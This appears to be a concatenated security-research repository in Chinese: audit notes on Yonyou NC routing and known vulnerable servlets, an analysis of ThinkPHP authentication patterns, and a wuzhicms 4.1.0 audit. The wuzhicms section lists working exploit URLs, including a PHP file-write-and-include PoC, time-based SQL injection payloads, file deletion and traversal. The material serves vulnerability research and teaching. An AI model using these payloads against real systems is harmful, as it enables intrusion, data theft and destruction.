--------------------------------------------------------------------------------
/Java_OA/yongyou_NC_Audit.md:
--------------------------------------------------------------------------------
  1 | ## 环境搭建
  2 | Windows Server虚拟机，安装SQL Server（推荐2008），并创建一个数据库，如nc65。
  3 | 
  4 | 解压用友NC的安装包，从NC6.5文件夹中找到yongyou_nc文件夹。找到文件夹中的setup.bat开始安装过程，需要注意
  5 | 
  6 | * NCHome目录路径中不能包含中文、空格或特殊字符。
  7 | * Windows环境变量中的JDK路径也不能包含空格等。
  8 | 
  9 | 安装后，打开用友UAP配置工具：`C:\yonyou\home\bin\sysConfig.bat`，双击SysConfig.bat启动。
 10 | 
 11 | 服务器选项可以配置JDK版本（需要与windows环境变量中的一致），还可以配置调试参数（点击读取应用服务器，在虚拟机参数后加入如下内容，再点击保存）
 12 | 
 13 | ```
 14 | Xdebug -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5555
 15 | ```
 16 | 
 17 | 并同时配置Web服务器，点击保存。
 18 | 
 19 | ![yongyou](https://user-images.githubusercontent.com/62204882/202337674-b501e085-5c15-4ca7-87ae-74252cc19fc8.jpg)
 20 | 
 21 | UAP配置工具的数据源选项则是配置数据库，选取上述创建的nc65即可。数据源名称和OID可随意设置
 22 | 
 23 | ![yongyou1](https://user-images.githubusercontent.com/62204882/202337958-146c3bed-b762-4bad-968c-d4cc3b36c13d.jpg)
 24 | 
 25 | 配置完成后，在home目录下找到startServer.bat，双击启动服务，服务启动成功后，访问127.0.0.1，端口为环境搭建时配置的端口。
 26 | 
 27 | 安装步骤具体可参考： https://blog.csdn.net/weixin_38766356/article/details/103983787
 28 | 
 29 | ## 路由分析
 30 | 核心路由都位于`/home/webapps/nc_web/WEB-INF/web.xml`，内容如下
 31 | ```
 32 | 	<servlet>
 33 | 		<servlet-name>ProvisionServlet</servlet-name>		
 34 | 		<servlet-class>nc.bs.framework.provision.server.ProvisionServlet</servlet-class>
 35 | 		<load-on-startup>5</load-on-startup>
 36 | 	</servlet>
 37 | 	
 38 | 	<servlet> 
 39 | 	 <servlet-name>NCInvokerServlet</servlet-name>
 40 | 	  <servlet-class>nc.bs.framework.server.InvokerServlet</servlet-class>
 41 | 	</servlet>
 42 | 	
 43 | 	<servlet>
 44 | 	 <servlet-name>NCFindWebServlet</servlet-name>
 45 | 	  <servlet-class>nc.bs.framework.server.FindWebResourceServlet</servlet-class>
 46 | 	</servlet>
 47 | 
 48 | <servlet-mapping>
 49 | 		<servlet-name>ProvisionServlet</servlet-name>
 50 | 		<url-pattern>/provision</url-pattern>
 51 | 	</servlet-mapping>
 52 | 	
 53 | 	<servlet-mapping>
 54 | 	  <servlet-name>NCInvokerServlet</servlet-name>
 55 | 	  <url-pattern>/service/*</url-pattern>
 56 | 	</servlet-mapping>
 57 | 	
 58 | 	<servlet-mapping>
 59 | 	  <servlet-name>NCInvokerServlet</servlet-name>
 60 | 	  <url-pattern>/servlet/*</url-pattern>
 61 | 	</servlet-mapping>
 62 | 
 63 | 	<servlet-mapping>
 64 | 		<servlet-name>NCFindWebServlet</servlet-name>
 65 | 		<url-pattern>/NCFindWeb</url-pattern>
 66 | 	</servlet-mapping>
 67 | ```
 68 | 总的来说有三个入口，（1）`/service/*`和`/servlet/*` （2）`/NCFindWeb` （3）`/provision`
 69 | 
 70 | 对于第二个入口，出现过目录遍历漏洞`/NCFindWeb?service=IPreAlertConfigService&filename=`；对于第一个入口，实际处理类都是InvokerServlet，其doGet和doPost方法，也是路由转发的核心，
 71 | ```
 72 | private void doAction(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
 73 |         String pathInfo = request.getPathInfo(); // /Servlet Path/ or Null
 74 |         try {
 75 |             if (pathInfo == null) {
 76 |                 throw new ServletException("Service name is not specified, pathInfo is null");
 77 |             }
 78 | 
 79 |             pathInfo = pathInfo.trim(); // 删除字符串的头尾空白符
 80 |             String moduleName = null;
 81 |             String serviceName = null;
 82 |             int beginIndex;
 83 |             if (pathInfo.startsWith("/~")) { /~xx/xxxx，xx被截取为moduleName，xxxx被截取为serviceName
 84 |                 moduleName = pathInfo.substring(2);
 85 |                 beginIndex = moduleName.indexOf("/");
 86 |                 if (beginIndex >= 0) {
 87 |                     serviceName = moduleName.substring(beginIndex);
 88 |                     if (beginIndex > 0) {
 89 |                         moduleName = moduleName.substring(0, beginIndex);
 90 |                     } else {
 91 |                         moduleName = null;
 92 |                     }
 93 |                 } else {
 94 |                     moduleName = null;
 95 |                     serviceName = pathInfo;
 96 |                 }
 97 |             } else {
 98 |                 serviceName = pathInfo;
 99 |             }
100 | 
101 |             if (serviceName == null) {
102 |                 throw new ServletException("Service name is not specified");
103 |             }
104 | 
105 |             beginIndex = serviceName.indexOf("/");
106 |             if (beginIndex < 0 || beginIndex >= serviceName.length() - 1) {
107 |                 throw new ServletException("Service name is not specified");
108 |             }
109 | 
110 |             serviceName = serviceName.substring(beginIndex + 1);
111 |             Object obj = null;
112 | 
113 |             String msg;
114 |             try {
115 |                 obj = this.getServiceObject(moduleName, serviceName);
116 |             }...
117 |             if (obj instanceof Servlet) {
118 |                 Logger.init(obj.getClass());
119 | 
120 |                 try {
121 |                     if (obj instanceof GenericServlet) {
122 |                         ((GenericServlet)obj).init();
123 |                     }
124 | 
125 |                     this.preRemoteProcess();
126 |                     ((Servlet)obj).service(request, response);
127 |                     this.postRemoteProcess();
128 |                 } ...
129 |             } ...
130 | 
131 |     }
132 | ```
133 | 核心逻辑是截取出`moduleName`和`serviceName`，然后反射调用对应的Servlet。`moduleName`可以从`/home/modules`中查找。如果所调用的Servlet位于`/home/lib`的某个jar文件中，那么`moduleName`可以是modules中的任意一个。
134 | 
135 | 访问路径如`http://172.16.165.146:8089/servlet/~uapss/com.yonyou.ante.servlet.FileReceiveServlet`，就调用的uapss模块下的FileReceiveServlet类。
136 | 
137 | 这些模块的位于安装目录下的`home/modules`目录中。
138 | 
139 | ## 已知漏洞
140 | ```
141 | # 反序列化漏洞
142 | http://172.16.165.146:8089/servlet/mxservlet
143 | http://172.16.165.146:8089/service/~uapss/nc.search.file.parser.FileParserServlet
144 | http://172.16.165.146:8089/servlet/~uapss/com.yonyou.ante.servlet.FileReceiveServlet
145 | http://172.16.165.146:8089/servlet/~aert/com.ufida.zior.console.ActionHandlerServlet
146 | http://172.16.165.146:8089/servlet/~ic/uap.framework.rc.controller.ResourceManagerServlet
147 | http://172.16.165.146:8089/servlet/~baseapp/nc.document.pub.fileSystem.servlet.DeleteServlet
148 | http://172.16.165.146:8089/servlet/~baseapp/nc.document.pub.fileSystem.servlet.DownloadServlet
149 | http://172.16.165.146:8089/servlet/~baseapp/nc.document.pub.fileSystem.servlet.UploadServlet
150 | http://172.16.165.146:8089/service/~xbrl/XbrlPersistenceServlet
151 | 
152 | /ServiceDispatcherServlet -> 参考：https://drea1v1.github.io/2020/06/17/%E7%94%A8%E5%8F%8Bnc%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
153 | 
154 | # 目录遍历
155 | http://172.16.165.146:8089/NCFindWeb?service=IPreAlertConfigService&filename=
156 | 
157 | # RCE
158 | http://172.16.165.146:8089/servlet/~ic/bsh.servlet.BshServlet
159 | ```
160 | 
161 | 
162 | 


--------------------------------------------------------------------------------
/Other_OA/Thinkphp框架鉴权分析.md:
--------------------------------------------------------------------------------
  1 | # Thinkphp框架鉴权分析
  2 | 
  3 | php框架鉴权方式很多和路由相关，框架与框架之间的鉴权方式类似，以thinkphp为例。thinkphp路由基本上是支持普通模式、混合模式（rewrite默认）和强制路由模式。这三种路由模式可以通过设置`app.php`进行配置。选择不同的路由模式可以相应配合不同形式的鉴权进行验证。
  4 | 
  5 | ## 1. Route类动态参数
  6 | 
  7 | 利用Route类option方法配置rule参数进行角色访问校验。
  8 | 
  9 | ```php
 10 | Route::get('view/:name$', 'News/read')->option('rule', 'admin');
 11 | ```
 12 | 
 13 | 在`application`目录下不同 `module`目录里面通过`route.php`在针对个别或特定模块的路由进行路由规则的设定的同时，不仅可以设置请求方式是get还是post等，可以通过option方法`option("rule", '指定的角色')`设置什么用户角色可以访问路由。同样也可以在全局的`route.php`设置角色校验。
 14 | 
 15 | 这里容易出现开发错误，option和append方法都可以进行Route参数配置，但不同的是，option 方法会覆盖已有的参数，而 append 方法会追加参数。因此开发过程中，不恰当使用后者append方法可能导致未授权访问的漏洞。
 16 | 
 17 | 同样`rule()`也可以进行校验：
 18 | 
 19 | ```
 20 | Route::get('view/:name$', 'News/read')->rule('admin');
 21 | ```
 22 | 
 23 | p.s. [thinkphp 5.1 路由参数](https://www.kancloud.cn/manual/thinkphp5_1/353965)
 24 | 
 25 | ## 2. 设置鉴权中间件（路由白名单）
 26 | 
 27 | 配合Route类强制设定某些类比如通过鉴权中间件后才行：
 28 | 
 29 | ```php
 30 | Route::rule('hello/:name','hello')->middleware('Auth');
 31 | ```
 32 | 
 33 | 也可以分组`group`后进行`middleware`校验。但该情况需要`thinkphp >= 5.1.6`。
 34 | 
 35 | 进行全局中间件权限校验可以进行`middleware.php`配置：
 36 | 
 37 | ```php
 38 | <?php
 39 |   return [
 40 |     \app\http\Authorization::class
 41 |   ];
 42 | ```
 43 | 
 44 | 和route.php一样也可以针对模块目录建立middleware.php文件进行部分鉴权。
 45 | 
 46 | p.s. [thinkphp 5.1 中间件](https://www.kancloud.cn/manual/thinkphp5_1/564279)
 47 | 
 48 | 其实这种和建立白名单、黑名单类似的。程序动态加载所有类之后，解析完路由，通过比对模块和调用的controller，从而判定是否进行鉴权。将配合比对的路由需要建立某个配置文件或存储在服务器的数据库中，动态获取存放在代码数组中，然后进行比对。只不过thinkphp在官方手册中指明通过路由中间件完成。
 49 | 
 50 | ## 3. 前后置行为检测：beforeAction和afterAction
 51 | 
 52 | [thinkphp api token](https://juejin.cn/s/thinkphp api token)
 53 | 
 54 | [HTTP Token 使用方式: Basic Token（淘汰）v.s Bearer Token（Auth2.0更安全）](https://xiang753017.gitbook.io/zixiang-blog/security/http-token-shi-yong-fang-shi-basic-token-v.s-bearer-token)
 55 | 
 56 | 类似中间件，对请求流进行拦截后进行检测、过滤和处理。在这里通常检测http请求报文中header的token是否有效。
 57 | 
 58 | 整体的鉴权逻辑是：
 59 | 
 60 | 1. 在用户登录成功后，生成一个Token，并将Token保存到用户表（数据库或redis）中的Token字段中，同时将Token返回给客户端。
 61 | 2. 客户端在后续的API请求中携带该Token，一般可以将Token作为请求头信息中的Authorization字段进行传递。
 62 | 3. 服务器端接收到API请求后，从请求头中获取Token，并根据Token查询用户表，判断该Token是否有效。
 63 | 4. 如果Token有效，允许API请求继续执行；如果Token无效，返回401 Unauthorized错误。
 64 | 
 65 | beforeAction和afterAction分别是前置方法检测和后置方法检测。 一般鉴权在beforeAction中检测，主要针对api检测，设置ApiAuth类的beforeAction方法。其他Api的Controller继承该ApiAuth类即可。
 66 | 
 67 | ```php
 68 | class ApiAuth extends \think\Controller
 69 | {
 70 |     public function beforeAction()
 71 |     {
 72 |         $token = $this->request->header('Authorization');
 73 |         $user = User::where('token', $token)->find();
 74 |         if (!$user) {
 75 |             $this->error('Unauthorized', null, null, 401);
 76 |         }
 77 |     }
 78 | }
 79 | ```
 80 | 
 81 | 这种token校验方式可以是自己编写的校验方式，也可以利用jwt token校验，还可以是Oauth 2.0令牌等等。在header中形式多为`Authoritarian: Bear xxxxx`（http默认用于传递token的形式），也可以在代码中添加header头自定义token传递模式。
 82 | 
 83 | ## 4. 验证码登录
 84 | 
 85 | 验证码配合登录主要还是验证作用，实际情况中相对于其他方式来说不对，因此简单说一下。但是遇到过两种情况：其一，用户输入验证码错误，后台不会清空session，该session在获取的时候是生成后就存放在服务器上了（可能是放在数据库也能redis或者文件格式也有）。由于session一般是全局使用的，某些模块判断当前session不为空，就允许访问该功能。乌云库有一个漏洞案例，说的是thinkphp没有重置session导致验证码可以爆破，但是衍生出更大的影响也可以绕过登录，获取一个低权限：[【wooyun-2015-0110497】ThinkPHP 默认配置导致验证码暴力破解（验证码错误session不重置）](https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0110497)。
 86 | 
 87 | 其二，由于测试原因，代码中会固定一个验证码，或者直接硬编码了一个验证码，比对输入的验证码是否等于该验证码。如果输入的预设好的验证码就可以获得一个低权限session。
 88 | 
 89 | ```php
 90 | //captcha.php 自定义获取验证码
 91 | <?php
 92 |   ...
 93 |   $captcha = input('captcha');
 94 |   $obj = new \app\common\System\Captcha();
 95 |   $code = '123456';  
 96 |   if ($captcha != $code){
 97 |       if ($obj->check($code, $captcha)){
 98 |         return 0;
 99 |       }
100 |   } else {
101 |     session_start();
102 |     session_id(code);
103 |     ... //进一步保存session到具体配置的形式中
104 |   }
105 | 
106 | //book.php 某功能php页面
107 | <?php 
108 |   if (empty($_SESSION)){
109 |     return 0;
110 |   } else {
111 |     ...
112 |     //具体功能代码
113 |   }
114 | ```
115 | 
116 | ## 5. 实现auth类和基于RBAC的第三方鉴权库
117 | 
118 | 思路大致是在形如`applicaiton/admin/controller`admin模块的controller目录下实现AuthController，其他类通过继承该类完成权限校验。特别是用于api接口，Common登录鉴权写于initialize方法或者直接写login方法进行鉴权。
119 | 
120 | 1. 实现`application/admin/controller/AuthController.php`的`initialize`方法，方便后续继承的类自动调用该方法。
121 | 
122 | ```php
123 | <?php
124 | 
125 | namespace app\admin\controller;
126 | 
127 | use think\Controller;
128 | use think\Db;
129 | 
130 | class AuthController extends Controller
131 | {
132 |     public function initialize()
133 |     {
134 |         header('Access-Control-Allow-Origin: *');
135 |         $login_token = input('login_token', 0);
136 |         $reslut = model('Admin')->check_login_token($login_token);
137 |         if ($reslut['code']) {
138 |             return $reslut;
139 |         } else {
140 |             return "login first!";              
141 |         }
142 |       ......
143 | ```
144 | 
145 | 2. `admin`模块需要鉴权的controller直接继承`AuthController`即可：
146 | 
147 | ```php
148 | <?php
149 | 
150 | namespace app\admin\controller;
151 | 
152 | use think\Controller;
153 | 
154 | class Admin extends AuthController //直接继承，后面直接写功能代码。不用再写鉴权代码
155 | {
156 | 
157 |     public function get_admin_list()
158 |     {
159 |         ......
160 | ```
161 | 
162 | 除了判断是否有权限访问模块，如果认为自我实现代码进行鉴权麻烦，还可以使用框架官方推荐的第三方库或者官方库。官方在thinkphp 3.x代码库中存在过一个[auth代码](https://github.com/top-think/thinkphp/blob/master/ThinkPHP/Library/Think/Auth.class.php)，不过后来没有了。后来基于tp5开发了类似的auth类：[5ini99/think-auth](https://github.com/5ini99/think-auth)。在thinkphp社区也有介绍：[基于thinkphp5的auth权限认证扩展](https://www.thinkphp.cn/extend/873.html)。还有一种不同于auth的方式，`thinkphp-auth`（github很多同名库）是基于RBAC建立的一种给thinkphp鉴权的系统。RABC鉴权是一种基于角色的访问控制机制，它通过将权限分配给角色，再将角色分配给用户来管理系统资源的访问权限。目前官方没有写过鉴权库，github上能找到的都是第三方。
163 | 


--------------------------------------------------------------------------------
/Other_OA/images/zentao1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao1.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao10.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao2.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao3.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao4.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao5.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao6.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao7.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao8.png


--------------------------------------------------------------------------------
/Other_OA/images/zentao9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ax1sX/SecurityList/5a99da1aa91685827c1e72429fff9dc63ce7967c/Other_OA/images/zentao9.png


--------------------------------------------------------------------------------
/Other_OA/wuzhicms.md:
--------------------------------------------------------------------------------
  1 | # wuzhicms（五指cms）
  2 | 
  3 | 北京五指互联科技有限公司（简称：五指互联）开发的网站内容管理系统，下载地址：https://github.com/wuzhicms/wuzhicms
  4 | 
  5 | 下载后解压，将`caches`和`coreframe`文件夹拷贝到`www`文件夹下，然后将`www`文件夹放到php集成环境中，重命名`www`为`wuzhicms`
  6 | 
  7 | 安装界面：http://127.0.0.1:8089/wuzhicms/install
  8 | 
  9 | 网站后台登陆界面：http://127.0.0.1:8089/wuzhicms/index.php?m=core&f=index&v=login&_su=wuzhicms
 10 | 
 11 | 
 12 | 
 13 | ## 架构分析
 14 | 框架的index.php为入口文件，代码如下
 15 | ```
 16 | if(PHP_VERSION < '5.2.0') die('Require PHP > 5.2.0 ');
 17 | //定义当前的网站物理路径
 18 | define('WWW_ROOT',dirname(__FILE__).'/');
 19 | 
 20 | require './configs/web_config.php';
 21 | require COREFRAME_ROOT.'core.php';
 22 | 
 23 | $app = load_class('application');
 24 | $app->run();
 25 | ```
 26 | 主要注意三个地方：（1）`web_config.php` （2）`COREFRAME_ROOT.core.php` （3）`load_class('application')` 。(2)涉及的是如何传参 (3)则是路由如何调用
 27 | 
 28 | (1) `web_config.php`。其中定义了诸多常量值，如下。那么index.php中的`COREFRAME_ROOT.core.php`实际指向的就是`coreframe/core.php`文件
 29 | ```php
 30 | define('COREFRAME_ROOT',substr(dirname(__FILE__),0,-11).'coreframe'.DIRECTORY_SEPARATOR);
 31 | ```
 32 | 
 33 | (2) `coreframe/core.php`。主要定义了类加载、字符处理相关函数，其中一个函数名为`set_globals()`，会对`$_GET`和`$_POST`进行遍历，将键值对的值转换为全局变量。
 34 | ```php
 35 | function set_globals() {
 36 |     if(isset($_GET)) {
 37 |         foreach ($_GET as $_key => $_value) {
 38 |             $GLOBALS[$_key] = gpc_stripslashes($_value);
 39 |         }
 40 |         $_GET = array();
 41 |     }
 42 |     if(isset($_POST)) {
 43 |         foreach ($_POST as $_key => $_value) {
 44 |             $GLOBALS[$_key] = gpc_stripslashes($_value);
 45 |         }
 46 |         $_POST = array();
 47 |     }
 48 | }
 49 | ```
 50 | 所以，在wuzhicms的审计过程中，可以看到很多函数中包含`$GLOBALS['a']`，这种是可以通过HTTP请求传入`a=xx`。即参数可控点。
 51 | 
 52 | (3) `load_class('application')`。主要用于加载class文件，如果`$static_class`变量中存在类就直接获取，否则从地址`coreframe/app/core/libs/class/$class.class.php`中获取
 53 | ```php
 54 | function load_class($class, $m = 'core', $param = NULL) {
 55 |     static $static_class = array();
 56 |   
 57 |     if (isset($static_class[$class])) {
 58 |         return $static_class[$class];     //判断是否存在类，存在则直接返回
 59 |     }
 60 |     $name = FALSE;
 61 |     if (file_exists(COREFRAME_ROOT.'app/'.$m.'/libs/class/'.$class.'.class.php')) { 
 62 |         $name = 'WUZHI_'.$class;
 63 |         if (class_exists($name, FALSE) === FALSE) {
 64 |             require_once(COREFRAME_ROOT.'app/'.$m.'/libs/class/'.$class.'.class.php');
 65 |         }
 66 |     }
 67 |     ...
 68 |     $static_class[$class] = isset($param) ? new $name($param) : new $name();
 69 |     return $static_class[$class];
 70 | }
 71 | ```
 72 | 类名在wuzhicms中都定义为`WUZHI_$class`类。那么`load_class('application')`即加载`WUZHI_application`类，该类部分代码如下
 73 | ```php
 74 | final class WUZHI_application {
 75 |     private $_m; // 模块名，取值方式：M
 76 |     private $_f; // 文件名 取值方式：F
 77 |     private $_v; // 方法名 取值方式：V
 78 |     
 79 |     private function setconfig() {
 80 |         $sn = $_SERVER["SERVER_NAME"];
 81 |         $route_config = get_config('route_config'); // $config[$filename] = include WWW_ROOT.'configs/'.$filename.'.php';
 82 |         if(isset($route_config[$sn])) {
 83 |             $route_config = $route_config[$sn];
 84 |         } else {
 85 |             $route_config = $route_config['default'];
 86 |         }...
 87 |     }
 88 | }
 89 | ```
 90 | `get_config(route_config)`方法即从`www/configs/route_config.php`中读取配置，`route_config.php`内容如下
 91 | ```php
 92 | return array(
 93 | 	'default'=>array('m'=>'content', 'f'=>'index', 'v'=>'init'),
 94 | );
 95 | ```
 96 | 即调用`content`模块的`index.php`文件的`init()`方法，从目录结构中查找对应的文件，可以判断出模块即为`coreframe/app/content`。目录结构如下
 97 | ```
 98 | wuzhicms-4.1.0
 99 | ├─bin
100 | ├─caches
101 | └─coreframe
102 |     └─app
103 |         ├─affiche
104 |         ├─appupdate
105 |         ├─attachement
106 |         ├─collect
107 |         ├─content
108 |            ├─admin
109 |            ├─fields
110 |            ├─libs
111 |            ├─city.php
112 |            ├─...
113 |            ├─index.php
114 | ```
115 | 也就是说，wuzhicms的coreframe下的文件路由访问形式均为：`http://ip:port/wuzhicms/index.php?m=xx&f=xx&v=xx&_su=wuzhicms`
116 | 
117 | ## 4.1.0版本漏洞分析
118 | |漏洞名称|访问路径|前台/后台|
119 | |:---:|:---:|:---:|
120 | |文件写入漏洞|`/wuzhicms/index.php?m=attachment&f=index&v=set&_su=wuzhicms&submit=1&setting=<%3fphp+phpinfo()%3b%3f>`|后台|
121 | |sql注入漏洞|`/wuzhicms/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&_submenuid=&keywords=1'`|后台|
122 | |sql注入漏洞|`/wuzhicms/index.php?m=coupon&f=card&v=detail_listing&_su=wuzhicms&groupname=1'`|后台|
123 | |sql注入漏洞|`/wuzhicms/index.php?m=member&f=group&_su=wuzhicms&v=del&groupid=1'`|后台|
124 | |sql注入漏洞|`/wuzhicms/index.php?m=order&f=card&v=listing&_su=wuzhicms&type=1&batchid=1'`|后台|
125 | |sql注入漏洞|`/wuzhicms/index.php?m=order&f=goods&v=listing&_su=wuzhicms&keywords=1&keytype=0&cardtype=1'`|后台|
126 | |sql注入漏洞|`/wuzhicms/index.php?m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords=1' `|后台|
127 | |sql注入漏洞|`/wuzhicms/www/api/sms_check.php?param=1'`|前台|
128 | |任意文件删除漏洞|`/wuzhicms/index.php?m=attachment&f=index&_su=wuzhicms&v=del&url=../z.txt`|后台|
129 | |目录遍历漏洞|`/wuzhicms/index.php?dir=.....///.....///&m=template&f=index&v=listing&_su=wuzhicms`|后台|
130 | |SSRF漏洞|`/wuzhicms/index.php?m=search&f=config&_su=wuzhicms&v=test&sphinxhost=xx&sphinxport=xx`|后台|
131 | |信息泄漏漏洞|`/wuzhicms/index.php?m=core&f=index&v=phpinfo&_su=wuzhicms&_menuid=0`|前台|
132 | 
133 | ### 文件写入漏洞
134 | 漏洞定位`coreframe/app/attachment/admin/index.php`的set方法
135 | ```php
136 | public function set()
137 | {
138 |     if (isset($GLOBALS['submit'])) {
139 |         set_cache(M, $GLOBALS['setting']); // 调用下方的set_cache方法
140 |         MSG(L('operation_success'), HTTP_REFERER, 3000);
141 |     } ...
142 | }
143 | 
144 | function set_cache($filename, $data, $dir = '_cache_'){
145 | 	static $_dirs;
146 | 	if ($dir == '') return FALSE;
147 | 	if (!preg_match('/([a-z0-9_]+)/i', $filename)) return FALSE;
148 | 	$cache_path = CACHE_ROOT . $dir . '/';
149 | 	if (!isset($_dirs[$filename . $dir])) {
150 | 		if (!is_dir($cache_path)) {
151 | 			mkdir($cache_path, 0777, true);
152 | 		}
153 | 		$_dirs[$filename . $dir] = 1;
154 | 	}
155 | 
156 | 	$filename = $cache_path . $filename . '.' . CACHE_EXT . '.php';
157 | 	if (is_array($data)) {
158 | 		$data = '<?php' . "\r\n return " . array2string($data) . '?>';
159 | 	}
160 | 	file_put_contents($filename, $data);
161 | }
162 | ```
163 | 在架构分析的(3)注意点中提到，`$GLOBALS['xx']`是可传入的。如果传入`submit`的值不为空，就会调用`set_cache()`方法，该方法最终调用`file_put_contents($filename, $data);`，将文件内容写入到缓存文件中。此时`$data`是`$GLOBALS['setting']`的值，该值是可以通过HTTP传入的，即文件内容可控，可以写入一句话木马。但是缓存文件名是不可控的，利用思路就是，找到一个可以包含该缓存文件的地方。
164 | 
165 | `set_cache()`是写入缓存，那么相对应的就是`get_cache()`方法来获取缓存，查找该文件中是否存在`get_cache()`方法的调用，查找到两处（1）`__construct()`魔术方法 (2) `ueditor()`方法。`ueditor()`方法如下
166 | ```php
167 | public function ueditor()
168 | {
169 |     if (isset($GLOBALS['submit'])) {
170 |         $cache_in_db = cache_in_db($GLOBALS['setting'], V, M);
171 |         set_cache(V, $GLOBALS['setting']);
172 |         MSG(L('operation_success'), HTTP_REFERER, 3000);
173 |     }
174 |     else {
175 |         $setting = get_cache(V); // 进入else需要submit为空，即不传入submit参数，调用get_cache方法，如下
176 |         if(empty($setting)) $setting = cache_in_db('', V, M);
177 |              include $this->template(V, M);
178 |         }
179 |     }
180 | }
181 | 
182 | function get_cache($filename, $dir = '_cache_'){
183 | 	$file = get_cache_path($filename, $dir);
184 | 	if (!file_exists($file)) return '';
185 | 	$data = include $file; // 文件包含
186 | 	return $data;
187 | }
188 | ```
189 | 那么这个漏洞的利用分为两步，（1）将恶意内容写入缓存文件（位于`/cache/_cache_/attachment.xxx.php`） （2）读取缓存文件的内容，POC如下
190 | ```
191 | # 1 写入一句话木马到缓存文件
192 | GET /wuzhicms/index.php?m=attachment&f=index&v=set&_su=wuzhicms&submit=1&setting=<%3fphp+phpinfo()%3b%3f>
193 | # 2 读取缓存文件
194 | GET /wuzhicms/index.php?m=attachment&f=index&v=ueditor&_su=wuzhicms
195 | ```
196 | 
197 | ### sql注入漏洞
198 | wuzhicms后台中有不少sql注入漏洞，其核心问题都在于`$where`变量没有做参数化/过滤，直接拼接到了sql语句中。其他的sql语句传入一般都用`intval()`限制了数据类型，或用`array('groupid' => $pid)`做了参数化处理
199 | 
200 | 以其中一个sql漏洞为例做分析，其他大同小异。漏洞定位：`coreframe/app/core/admin/copyfrom.php`
201 | 
202 | ```php
203 | public function listing() {
204 |   $siteid = get_cookie('siteid');
205 |   $page = isset($GLOBALS['page']) ? intval($GLOBALS['page']) : 1; // 获取page值，没有的话就为1
206 |   $page = max($page,1);
207 |   if(isset($GLOBALS['keywords'])) { // 如果设置了keywords就用该关键字过滤数据
208 |     $keywords = $GLOBALS['keywords'];
209 |     $where = "`name` LIKE '%$keywords%'";
210 |   } else {
211 |     $where = '';
212 |   }
213 |   $result = $this->db->get_list('copyfrom', $where, '*', 0, 20,$page); // 从copyfrom表中获取数据
214 |   $pages = $this->db->pages;
215 |   $total = $this->db->number;
216 |   include $this->template('copyfrom_listing');
217 | }
218 | ```
219 | `get_list()`方法首先用`$where = $this->array2sql($where);`将数组转换为sql形式，在这个过程中（1）如果传入的$where是数组，则将`%20 %27 ( ) '`这些字符转换成空；（2）如果传入的$where不是数组，则只将`%20 %27`替换为空
220 | 
221 | 最终调用的都是`coreframe/app/core/libs/class/mysql.class.php`中的`get_list()`或`get_one()`方法，这两个方法核心代码相同，如下
222 | ```php
223 | var $tablepre = 'wz_';
224 | 
225 | $sql = 'SELECT '.$field.' FROM `'.$this->tablepre.$table.'`'.$where.$group.$order.$limit;
226 | $query = $this->query($sql);
227 | ```
228 | 总的来说，`$where`是由`keywords`参数传入的。如果keywords不是数组形式，就只对`%20 %27`替换为空，没有其他的过滤。然后执行了sql语句为`SELECT COUNT(*) AS num FROM `wz_copyfrom` WHERE `name` LIKE '%'%' LIMIT 0,1`。
229 | 
230 | 拿sqlmap都能直接跑出payload，基本形式均为
231 | ```
232 | 1' AND (SELECT 1228 FROM (SELECT(SLEEP(5)))jFgw)-- JQJJ
233 | ```
234 | 其他后台sql基本形式如下
235 | ```
236 | m=coupon&f=card&v=detail_listing&_su=wuzhicms&groupname=1' AND (SELECT 4814 FROM (SELECT(SLEEP(5)))UYWY)-- XqZC
237 | m=member&f=group&_su=wuzhicms&v=del&groupid=1 AND 5623=BENCHMARK(5000000,MD5(0x6c4d6542))
238 | m=order&f=card&v=listing&_su=wuzhicms&type=1&batchid=1' AND (SELECT 1228 FROM (SELECT(SLEEP(5)))jFgw)-- JQJJ
239 | m=order&f=goods&v=listing&_su=wuzhicms&keywords=1&keytype=0&cardtype=1' AND (SELECT 1228 FROM (SELECT(SLEEP(5)))jFgw)-- JQJJ
240 | m=promote&f=index&v=search&_su=wuzhicms&fieldtype=place&keywords=1' AND (SELECT 1228 FROM (SELECT(SLEEP(5)))jFgw)-- JQJJ
241 | ```
242 | 
